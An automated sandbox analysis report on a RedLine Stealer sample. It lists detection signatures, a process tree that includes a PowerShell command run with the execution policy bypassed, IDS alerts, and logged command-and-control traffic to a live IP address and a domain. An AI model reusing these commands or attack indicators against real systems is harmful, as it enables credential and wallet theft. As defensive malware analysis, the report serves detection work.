Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Analysis ID:1294691
MD5:19124312cafa0b1c5524329755a5d6a2
SHA1:ccd8c01b210b26cd708a3e4cc49de45fed9abac1
SHA256:0190e867668e9be091e3d52261b62ef9b65059565ec17168813f82e7693af2fd
Tags:exe
Infos:

Detection

RedLine
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Yara detected RedLine Stealer
Yara detected MalDoc
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Bypasses PowerShell execution policy
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Adds / modifies Windows certificates
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Stores large binary data to the registry
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe (PID: 7004 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe MD5: 19124312CAFA0B1C5524329755A5D6A2)
    • msiexec.exe (PID: 6200 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692671532 " MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • msiexec.exe (PID: 7092 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 7140 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3407EF71A9E7EFAA675EDBEA938667C8 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 6316 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding AADEFB259C244F0AA7BE078D54CFCDDA MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • powershell.exe (PID: 6556 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss77D9.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi77C5.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr77D6.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr77D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msiJoeSecurity_MalDocYara detected MalDocJoe Security
        C:\Windows\Installer\446fc6.msiJoeSecurity_MalDocYara detected MalDocJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: powershell.exe PID: 6556JoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Process Memory Space: powershell.exe PID: 6556JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:192.168.2.345.135.232.244973698782046105 08/21/23-19:35:51.013900
                  SID:2046105
                  Source Port:49736
                  Destination Port:9878
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.345.135.232.244973798782046045 08/21/23-19:35:51.481894
                  SID:2046045
                  Source Port:49737
                  Destination Port:9878
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:45.135.232.24192.168.2.39878497372046056 08/21/23-19:35:54.924171
                  SID:2046056
                  Source Port:9878
                  Destination Port:49737
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.345.135.232.244973698782046045 08/21/23-19:35:51.013900
                  SID:2046045
                  Source Port:49736
                  Destination Port:9878
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.345.135.232.244973798782046105 08/21/23-19:35:54.854691
                  SID:2046105
                  Source Port:49737
                  Destination Port:9878
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeReversingLabs: Detection: 13%
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeVirustotal: Detection: 11%Perma Link

                  Compliance

                  barindex
                  Uses insecure TLS / SSL version for HTTPS connection
                  Source: unknownHTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49723 version: TLS 1.0
                  Uses 32bit PE files
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Uses secure TLS version for HTTPS connections
                  Source: unknownHTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49724 version: TLS 1.2
                  PE / OLE file has a valid certificate
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: certificate valid
                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Binary contains paths to debug symbols
                  Source: Binary string: wininet.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb| source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr
                  Source: Binary string: wininet.pdbUGP source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.dr
                  Source: Binary string: System.ServiceModel.pdb source: powershell.exe, 00000005.00000002.521530251.0000000000937000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb_ source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CF27F0 ReadFile,FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_00CF27F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CCC9A0 FindFirstFileW,GetLastError,FindClose,0_2_00CCC9A0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CF3E10 FindFirstFileW,FindClose,CloseHandle,CloseHandle,CreateFileW,SetFilePointer,SetEndOfFile,FindCloseChangeNotification,DeleteFileW,DeleteFileW,DeleteFileW,CloseHandle,0_2_00CF3E10
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CCC040 _wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_00CCC040
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CCE270 FindFirstFileW,FindClose,0_2_00CCE270
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CCC3D0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,0_2_00CCC3D0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D108C0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_00D108C0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CDAB40 FindFirstFileW,FindClose,FindClose,0_2_00CDAB40
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CFCDD0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_00CFCDD0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD11B0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,0_2_00BD11B0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CFD1D0 FindFirstFileW,FindClose,0_2_00CFD1D0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CB1410 FindFirstFileW,FindNextFileW,FindClose,0_2_00CB1410

                  Networking

                  barindex
                  Yara detected MalDoc
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi, type: DROPPED
                  Source: Yara matchFile source: C:\Windows\Installer\446fc6.msi, type: DROPPED
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.3:49736 -> 45.135.232.24:9878
                  Source: TrafficSnort IDS: 2046105 ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) 192.168.2.3:49736 -> 45.135.232.24:9878
                  Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.3:49737 -> 45.135.232.24:9878
                  Source: TrafficSnort IDS: 2046105 ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) 192.168.2.3:49737 -> 45.135.232.24:9878
                  Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer Activity (Response) 45.135.232.24:9878 -> 192.168.2.3:49737
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: unknownHTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49723 version: TLS 1.0
                  Source: global trafficHTTP traffic detected: GET /?status=reg&key=llks74638sj&site=Test HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /?status=start&av=Windows%20Defender HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ru
                  Source: global trafficHTTP traffic detected: GET /?status=install HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ru
                  Source: global trafficTCP traffic: 192.168.2.3:49735 -> 45.135.232.24:9878
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.drString found in binary or memory: http://.css
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.drString found in binary or memory: http://.jpg
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStam$0K
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI76B1.tmp.1.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.406238979.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.403706789.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.401802192.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.521530251.00000000009A7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.401219466.0000000000995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000005.00000003.406446885.0000000007144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drString found in binary or memory: http://crls.ssl.co
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI76B1.tmp.1.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.drString found in binary or memory: http://html4/loose.dtd
                  Source: powershell.exe, 00000005.00000002.541635765.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.497379315.0000000007DC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                  Source: powershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drString found in binary or memory: http://ocsps.ssl.com0
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.404099594.00000000070DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
